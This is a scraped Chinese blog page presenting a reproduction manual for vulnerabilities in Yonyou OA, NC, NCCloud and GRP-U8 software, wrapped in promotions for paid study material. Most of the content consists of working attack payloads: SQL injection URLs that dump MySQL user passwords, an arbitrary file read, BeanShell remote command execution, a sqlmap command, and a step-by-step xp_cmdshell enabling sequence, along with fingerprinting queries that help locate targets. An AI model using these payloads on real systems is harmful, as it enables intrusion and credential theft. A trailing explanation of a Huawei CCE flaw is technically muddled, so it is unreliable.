用友OA漏洞复现手册_cnnvd-201610-923,2024字节跳动春招技术面试题

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以添加V获取:vip204888 (备注网络安全)
img

正文

查看所有数据库中的表名
/yyoa/common/js/menu/test.jsp?doType=101&S1=(select%20table_name,table_schema%20from%20information_schema.tables)

(3)查看指定表中的字段名
/yyoa/common/js/menu/test.jsp?doType=101&S1=(select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27user%27)

(4)查看指定数据库,表中字段的字段值
/yyoa/common/js/menu/test.jsp?doType=101&S1=(select%20group_concat(User,CHAR(32),Password)%20from%20mysql.user)


(1)查看当前数据库名和用户  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/ba2ef24531f140a7ac3d90748bbe8460.png)  
 (2)查看当前数据库中所有的表名  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/b8449e79f9364527a31973326b27e536.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAMXN0UGVhaw==,size_20,color_FFFFFF,t_70,g_se,x_16)


查看所有数据库中的表名  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/59bfcada4107476cb9a02a74023b34d5.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAMXN0UGVhaw==,size_20,color_FFFFFF,t_70,g_se,x_16)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/0fbe2e648d0342f28975031b92dd7b4f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAMXN0UGVhaw==,size_20,color_FFFFFF,t_70,g_se,x_16)


(3)查看指定表中的字段名  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/45c8cb054139429fb90e8e752a26a461.png)  
 (4)查看指定数据库,表中字段的字段值


![在这里插入图片描述](https://img-blog.csdnimg.cn/0e94d64859cd452fa97e4d86027911a3.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAMXN0UGVhaw==,size_20,color_FFFFFF,t_70,g_se,x_16)


## 
用友 NC NCFindWeb 任意文件读取漏洞


**漏洞描述**  
 用友NC存在任意文件读取漏洞,攻击者通过漏洞可读取服务器敏感文件


**漏洞影响**  
 用友NC


**网络测绘**



icon_hash=“1085941792”


**漏洞复现**


1、首页  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/74761dddf2224b6387c866f7c77feb5c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAMXN0UGVhaw==,size_20,color_FFFFFF,t_70,g_se,x_16)


2、


POC:



/NCFindWeb?service=IPreAlertConfigService&filename
/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml


![在这里插入图片描述](https://img-blog.csdnimg.cn/8e03b0b0e747429b84f1f91b1b18dcb6.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAMXN0UGVhaw==,size_20,color_FFFFFF,t_70,g_se,x_16)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/32f4c7d8ca544b808bf013908ff9b32b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAMXN0UGVhaw==,size_20,color_FFFFFF,t_70,g_se,x_16)


## 
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞


**漏洞描述**  
 用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限


**漏洞影响**  
 用友 NC


**网络测绘**



icon_hash=“1085941792”


**漏洞复现**  
 POC:



/servlet/~ic/bsh.servlet.BshServlet


代码执行命令:



print(“hello!”);
exec(“whoami”);


![在这里插入图片描述](https://img-blog.csdnimg.cn/03ae8406eb65465d8c76326034a997da.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAMXN0UGVhaw==,size_20,color_FFFFFF,t_70,g_se,x_16)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/e2ab3b9edce44644b238ba89d7fd52bc.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAMXN0UGVhaw==,size_20,color_FFFFFF,t_70,g_se,x_16)


## 
用友 NCCloud FS文件管理SQL注入


**漏洞描述**  
 用友 NCCloud FS文件管理登录页面对用户名参数没有过滤,存在SQL注入


**漏洞影响**  
 用友 NCCloud


**网络测绘**



“NCCloud”


**漏洞复现**  
 POC:



http://xx.xx.xx.xx/fs/


1、登陆界面  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/edf644d1349b4988a38375eb30f12d35.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAMXN0UGVhaw==,size_20,color_FFFFFF,t_70,g_se,x_16)  
 2、查看能否访问fs目录  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/076e1945b67d4d0e8491c78eace34992.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAMXN0UGVhaw==,size_20,color_FFFFFF,t_70,g_se,x_16)  
 3、输入账号密码,抓包注入



GET /fs/console?username=222&password=WiEZoxowjDhBk7bfE9nvzP3TjiK%2FRivMT1jKxrq42bI%3D HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://xx.xx.xx.xx/fs/
Cookie: txtime=3; txid=b739672ff4c68a5b8450A1649974747953A261714; txtime=0; txid=b739672ff4c68a5b8450A1649974747953A261384; JSESSIONID=E45320CE48B012BB5E916D65BEC18C7A.ncMem04
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1


用sqlmap对username参数进行注入



py -3 sqlmap.py -r 1.txt -p username --dbs --batch


![在这里插入图片描述](https://img-blog.csdnimg.cn/c9faf0036f5b4ebe89d56e9687d7f81f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAMXN0UGVhaw==,size_20,color_FFFFFF,t_70,g_se,x_16)


## 
用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923


**漏洞描述**  
 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载外部SQL语句,以及命令执行


**影响版本**  
 用友GRP-U8行政事业内控管理软件(新政府会计制度专版)


**网络测绘**



title=“用友GRP-U8行政事业内控管理软件”


**漏洞复现**  
 1、POC



POST /Proxy HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=E15264F5F83AFE80D7E9F7A9CF3250D2
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 348

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?>XML AS_DataRequest ProviderNameDataSetProviderData Dataselect user,db_name(),host_name(),@@version


F12查看SQL语句结果  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/43aba7048acb42a1b50098d2fda90cf9.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAMXN0UGVhaw==,size_20,color_FFFFFF,t_70,g_se,x_16)  
 2、命令执行  
 POST POC



cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?>XMLAS_DataRequestProviderNameDataSetProviderDataDataexec xp_cmdshell “whoami”


![在这里插入图片描述](https://img-blog.csdnimg.cn/afc8a194099f443abc2f888037953bfa.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAMXN0UGVhaw==,size_20,color_FFFFFF,t_70,g_se,x_16)  
 3、如果遇到如下所示无法执行,非100%成功解决方法  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/8d00dbba375e46d08e2d2c5ee7c3a7ff.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAMXN0UGVhaw==,size_20,color_FFFFFF,t_70,g_se,x_16)  
 将如下POST数据按顺序发送  
 注:下面数据包中的master改为当前数据库名  
 执行过程中报错java.sql.SQLException【错误代码: 0; 相关信息: xxxx不用管,全部执行完成后再执行系统命令



cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?>XMLAS_DataRequestProviderNameDataSetProviderDataDatause master



cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?>XMLAS_DataRequestProviderNameDataSetProviderDataDataexec sp_configure ‘show advanced options’,1



cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?>XMLAS_DataRequestProviderNameDataSetProviderDataDatareconfigure



cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?>XMLAS_DataRequestProviderNameDataSetProviderDataDataexec sp_configure ‘xp_cmdshell’,1




还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!


王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。


对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!


【完整版领取方式在文末!!】


***93道网络安全面试题***


![](https://img-blog.csdnimg.cn/img_convert/6679c89ccd849f9504c48bb02882ef8d.png)








![](https://img-blog.csdnimg.cn/img_convert/07ce1a919614bde78921fb2f8ddf0c2f.png)





![](https://img-blog.csdnimg.cn/img_convert/44238619c3ba2d672b5b8dc4a529b01d.png)





内容实在太多,不一一截图了


### 黑客学习资源推荐


最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!


对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

#### 1️⃣零基础入门


##### ① 学习路线


对于从来没有接触过网络安全的同学,我们帮你准备了详细的**学习成长路线图**。可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。


![image](https://img-blog.csdnimg.cn/img_convert/acb3c4714e29498573a58a3c79c775da.gif#pic_center)


##### ② 路线对应学习视频


同时每个成长路线对应的板块都有配套的视频提供:


![image-20231025112050764](https://img-blog.csdnimg.cn/874ad4fd3dbe4f6bb3bff17885655014.png#pic_center)

**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)**
![img](https://img-blog.csdnimg.cn/img_convert/9d80fb3bc28b37b76b6c8c2fac5102e6.png)

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**

:


![image-20231025112050764](https://img-blog.csdnimg.cn/874ad4fd3dbe4f6bb3bff17885655014.png#pic_center)

**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)**
[外链图片转存中...(img-Q48cJioD-1713625901543)]

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**

  • 12
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现是指通过模拟攻击者的行为,验证一个漏洞是否存在、是否可利用。下面以CNNVD-202104-1274漏洞为例,介绍一下漏洞复现的步骤: 1. 漏洞介绍 CNNVD-202104-1274漏洞是指华为云容器引擎CCE(Cloud Container Engine)在使用kubernetes管理容器时存在的一种远程代码执行漏洞。攻击者可以通过构造恶意请求,执行任意命令。 2. 环境准备 为了进行漏洞复现,需要安装以下工具: - kubectl:kubernetes的命令行工具,用于管理kubernetes集群。 - minikube:用于本地测试kubernetes应用程序的工具。 3. 复现步骤 3.1 部署CCE 首先,需要在minikube中部署CCE,具体步骤可以参考华为云官方文档。 3.2 构造恶意请求 攻击者可以通过构造恶意pod模板,触发漏洞。 ``` apiVersion: v1 kind: Pod metadata: name: test spec: containers: - name: test image: nginx command: ["/bin/sh","-c"] args: ["echo `whoami`;id"] volumeMounts: - name: test mountPath: /var/run/secrets/kubernetes.io/serviceaccount readOnly: true volumes: - name: test hostPath: path: /var/run/secrets/kubernetes.io/serviceaccount ``` 在这个模板中,攻击者通过在command字段中加入命令,达到远程执行命令的目的。 3.3 发起攻击 使用kubectl命令创建恶意pod: ``` kubectl apply -f pod.yaml ``` 当pod启动后,攻击者可以通过访问pod的日志,获取到执行命令的结果: ``` kubectl logs test ``` 4. 漏洞修复 华为云已经发布了漏洞修复的升级包,建议及时进行升级。 以上就是CNNVD-202104-1274漏洞漏洞复现步骤。需要注意的是,漏洞复现时需要遵循法律法规,不得进行非法攻击行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值